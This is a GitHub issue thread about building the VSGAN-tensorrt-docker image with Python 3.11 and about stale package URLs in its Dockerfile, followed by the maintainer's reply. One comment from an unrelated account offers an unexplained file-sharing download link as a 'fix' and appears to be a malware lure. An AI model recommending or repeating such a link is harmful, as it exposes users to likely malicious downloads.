### ISSUE TITLE
python 3.12 essential?

### ISSUE THREAD

**Issue by abcnorio** [styler00dollar/VSGAN-tensorrt-docker#78]
Hello,

is python 3.12 essential or will the docker still build without errors with 3.11?

Reason is I wanted to add some more vs plugin(s) and most are older and not maintained anymore and at least one depends on python module `imp` and not `importlib` and this was removed in 3.12  - see [here](https://docs.python.org/3.11/library/imp.html) so it would require to re-write the plugin to work with `importlib` instead of `imp`.

It if does not work with 3.11 that's fine, it's not the most important plugin and I can drop it.
Thanks!

btw - thanks for your other answer, very appreciated!

btw2 - line 467 (vsgan build)

`https://gitlab.com/nvidia/container-images/cuda/blob/master/dist/11.4.2/ubuntu2204/base/Dockerfile`

should probably now point to 12.5.1 (?)

btw3 - line 680ff. should change to
```

RUN wget https://mirrors.edge.kernel.org/ubuntu/pool/main/libt/libtirpc/libtirpc-dev_1.3.4%2Bds-1.3_amd64.deb \
	 https://mirrors.edge.kernel.org/ubuntu/pool/main/libx/libxcrypt/libcrypt-dev_4.4.36-4build1_amd64.deb \
	 https://mirrors.edge.kernel.org/ubuntu/pool/main/libx/libxcrypt/libcrypt1_4.4.36-4build1_amd64.deb \
	 https://mirrors.edge.kernel.org/ubuntu/pool/main/libn/libnsl/libnsl-dev_1.3.0-3build3_amd64.deb \
         https://mirrors.edge.kernel.org/ubuntu/pool/main/g/glibc/libc6_2.40-1ubuntu3_amd64.deb \
	 https://mirrors.edge.kernel.org/ubuntu/pool/main/g/glibc/libc6-dev_2.40-1ubuntu3_amd64.deb \
	 https://mirrors.edge.kernel.org/ubuntu/pool/main/g/glibc/libc-bin_2.40-1ubuntu3_amd64.deb \
	 https://mirrors.edge.kernel.org/ubuntu/pool/main/g/glibc/libc-dev-bin_2.40-1ubuntu3_amd64.deb \
	 https://mirrors.edge.kernel.org/ubuntu/pool/main/l/linux/linux-libc-dev_6.8.0-45.45_amd64.deb \
	 https://mirrors.edge.kernel.org/ubuntu/pool/main/r/rpcsvc-proto/rpcsvc-proto_1.4.2-0ubuntu7_amd64.deb \
	 https://mirrors.edge.kernel.org/ubuntu/pool/main/libt/libtirpc/libtirpc3t64_1.3.4%2Bds-1.3_amd64.deb
```

some versions changed on the servers.

**Comment by wardahub-design** [comment]
This might help:This file might fix it
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic

you may need to install the c compiler

**Comment by styler00dollar** [comment]
> is python 3.12 essential

No, you can build it with 3.11 and it should work fine, but I won't downgrade it myself. You should be able to build it yourself if you adjust the dockerfile. [Outdated 3.11 reference.](https://github.com/styler00dollar/VSGAN-tensorrt-docker/blob/8c74173fcd7d7cbf3839ede0112e0ff15f93acf0/Dockerfile)

> should probably now point to 12.5.1 (?)

The non-avx docker is not updated yet, which you probably refer to. I plan to do so soon.

> some versions changed on the servers

I adjust these urls all the time, but they keep changing. I usually adjust them if I try to build the docker and get 404 errors. Not sure if there is a better solution. I require the latest versions.
